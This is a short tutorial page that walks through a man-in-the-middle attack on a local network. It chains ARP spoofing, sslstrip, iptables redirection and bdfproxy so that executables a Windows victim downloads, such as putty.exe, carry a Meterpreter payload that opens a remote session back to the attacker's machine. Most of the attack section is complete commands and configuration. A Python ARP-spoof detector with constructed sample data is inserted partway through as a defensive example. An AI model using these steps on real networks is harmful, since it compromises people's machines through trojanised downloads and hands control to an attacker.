|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed 29.03.2017

Man in the Middle with bdfproxy


A man in the middle position means that, for some reason, all network traffic of a victim gets routed through the attacker's machine.

man in the middle attack

Such a position allows an attacker to redirect or modify unprotected packets, e.g. to steal information or to deliver malware to a victim.
With the tool bdfproxy this attack can be set up quickly. The proxy recognizes binaries for different architectures passing through it and can automatically patch a Meterpreter payload into them. As most pages on the internet try to prevent this kind of attack by using https, the example below combines bdfproxy with sslstrip.

setup attacker


Kali Linux is used as the attacking machine. The Windows victim is located in the same network, so the man in the middle position can be achieved by spoofing ARP messages.

/etc/bdfproxy/bdfproxy.cfg

For the Meterpreter to be able to connect back to the attacker, the IP addresses in the bdfproxy config have to be changed to the attacker's address (the two substitutions below are vim commands applied to the file).

...
proxyMode = regular
...
:%s/192.168.1.168/<attackerIP>/g
:%s/192.168.1.16/<attackerIP>/g

/etc/proxychains

Proxychains will be used to forward the traffic from sslstrip to bdfproxy.

strict_chain
[ProxyList]
http    127.0.0.1 8080

setup routing

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
echo 1 >/proc/sys/net/ipv4/ip_forward

start bdfproxy

bdfproxy

start listener

The tool bdfproxy creates a Metasploit resource script which can be executed with msfconsole.

systemctl start postgresql
msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

start sslstrip with proxychains

proxychains sslstrip -l 10000

start arpspoof

arpspoof -t <targetIP> -i <iface> -r <gatewayIP>
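Seen from the defender's side, the arpspoof step above has a recognisable signature: the gateway's IP suddenly answers from a different MAC, and with -r one MAC claims both the gateway's and the target's IP. The following detector is an added example, not part of the original page; the baseline table, the IPs and the MACs are constructed placeholders.

```python
"""Flag ARP replies that look like bidirectional ARP spoofing.
Added example; sample data below is constructed, not captured."""
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Constructed baseline, e.g. recorded from `arp -a` while the network was clean.
KNOWN_MACS: Dict[str, str] = {
    "192.168.1.1": "aa:bb:cc:00:00:01",   # gateway
    "192.168.1.50": "aa:bb:cc:00:00:50",  # victim workstation
}

# Constructed ARP-reply observations as (sender IP, sender MAC), in arrival order.
SAMPLE_REPLIES: List[Tuple[str, str]] = [
    ("192.168.1.1", "aa:bb:cc:00:00:01"),
    ("192.168.1.50", "aa:bb:cc:00:00:50"),
    ("192.168.1.1", "de:ad:be:ef:00:99"),   # third host claims the gateway IP
    ("192.168.1.50", "de:ad:be:ef:00:99"),  # same host claims the victim IP (-r)
    ("192.168.1.1", "de:ad:be:ef:00:99"),   # spoofed replies repeat periodically
]


def detect_arp_spoof(replies: Iterable[Tuple[str, str]],
                     known: Dict[str, str] = KNOWN_MACS,
                     max_ips_per_mac: int = 1) -> List[str]:
    """Return a list of alert strings; an empty list means nothing suspicious."""
    alerts: List[str] = []
    ips_by_mac = defaultdict(set)
    for ip, mac in replies:
        mac = mac.lower()
        expected = known.get(ip)
        # A known address answering from a different hardware address.
        if expected is not None and expected != mac:
            msg = f"{ip} changed from {expected} to {mac}"
            if msg not in alerts:          # the spoofed reply repeats, report it once
                alerts.append(msg)
        ips_by_mac[mac].add(ip)
    for mac, ips in ips_by_mac.items():
        # One MAC answering for several IPs is what the -r (bidirectional) mode looks like.
        if len(ips) > max_ips_per_mac:
            alerts.append(f"{mac} claims {len(ips)} addresses: {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoof(SAMPLE_REPLIES):
        print("ALERT:", line)
```

Feeding it real data means replacing SAMPLE_REPLIES with replies captured on the interface; hosts that legitimately hold several IPs need a higher max_ips_per_mac.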

test attack on victim


To test the attack, use the Windows victim to search for the SSH tool putty.exe and browse to its download page. The download link for the binary should have been stripped from https to http.
If you download and run putty.exe on the Windows machine, a remote Meterpreter session should start.

mitmproxy


To only record outgoing TLS traffic instead of modifying it, use mitmproxy.